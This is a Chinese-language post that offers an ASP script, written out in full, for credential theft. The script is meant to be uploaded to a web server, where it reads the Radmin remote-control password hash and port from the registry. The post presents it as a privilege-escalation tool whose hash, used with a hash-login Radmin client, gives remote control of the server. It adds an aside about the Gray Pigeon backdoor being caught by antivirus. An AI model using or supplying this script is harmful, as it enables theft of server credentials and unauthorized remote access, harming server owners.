读取radmin影子版HASH密码的asp代码

      把以下这段代码保存在为radmin.asp文件，然后上传到网站空间，在访问http://你的网站/radmin.asp，将返回如下结果

The Result of Radmin Hash
Parameter:a5a4facdf9814d43a1dc6648e315d3d0
Port:4489

就表示成功获取radmin HASH成功和端口号。。。，这个前提是要网站服务器空间安装有radmin软件，适合用于网站服务器提权使用。。。虽然无法获取实际的密码，但是如果配合radmin_hash版本，完全可以进行远程连接到服务器中去的。说句题外话，radmin远程控制确实不错的，适用起来也方便稳定，有点缺憾的是只能进行主动连接，没有反弹连接的功能，不过这样相对来说也安全性更加高吧？要不就会像灰鸽子一样，被杀毒软件杀的体无完肤了。。。

1. <%
   
2. '================================Main=================
   
3. Set WSH= Server.CreateObject("WSCRIPT.SHELL")
   
4. RadminPath="HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters"
   
5. Parameter="Parameter"
   
6. Port = "Port"
   
7. ParameterArray=WSH.REGREAD(RadminPath & Parameter )
   
8. Response.write "The Result of Radmin Hash"
   
9. Response.write "<br><br>"
   
10. Response.write Parameter&":"
    
11. '=========== ReadPassWord =========
    
12. If IsArray(ParameterArray) Then
    
13. For i = 0 To UBound(ParameterArray)
    
14. If Len (hex(ParameterArray(i)))=1 Then
    
15. strObj = strObj & "0" & CStr(Hex(ParameterArray(i)))
    
16. Else
    
17. strObj = strObj & Hex(ParameterArray(i))
    
18. End If
    
19. Next
    
20. response.write Lcase(strobj)
    
21. Else
    
22. response.write "Error! Can't Read!"
    
23. End If
    
24. Response.write "<br><br>"
    
25. '=========== ReadPort =========
    
26. PortArray=WSH.REGREAD(RadminPath & Port )
    
27. If IsArray(PortArray) Then
    
28. Response.write Port &":"
    
29. Response.write hextointer(CStr(Hex(PortArray(1)))&CStr(Hex(PortArray(0))))
    
30. Else
    
31. Response.write "Error! Can't Read!"
    
32. End If
    
33. '=======================================hex TO int===================================
    
34. Function hextointer(strin)
    
35. Dim i, j, k, result
    
36. result = 0
    
37. For i = 1 To Len(strin)
    
38. If Mid(strin, i, 1) = "f" or Mid(strin, i, 1) ="F" Then
    
39. j = 15
    
40. End If
    
41. If Mid(strin, i, 1) = "e" or Mid(strin, i, 1) = "E" Then
    
42. j = 14
    
43. End If
    
44. If Mid(strin, i, 1) = "d" or Mid(strin, i, 1) = "D" Then
    
45. j = 13
    
46. End If
    
47. If Mid(strin, i, 1) = "c" or Mid(strin, i, 1) = "C" Then
    
48. j = 12
    
49. End If
    
50. If Mid(strin, i, 1) = "b" or Mid(strin, i, 1) = "B" Then
    
51. j = 11
    
52. End If
    
53. If Mid(strin, i, 1) = "a" or Mid(strin, i, 1) = "A" Then
    
54. j = 10
    
55. End If
    
56. If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then
    
57. j = CInt(Mid(strin, i, 1))
    
58. End If
    
59. For k = 1 To Len(strin) - i
    
60. j = j * 16
    
61. Next
    
62. result = result + j
    
63. Next
    
64. hextointer = result
    
65. End Function
    
66. '====================================== End ======================================
    
67. %>

复制代码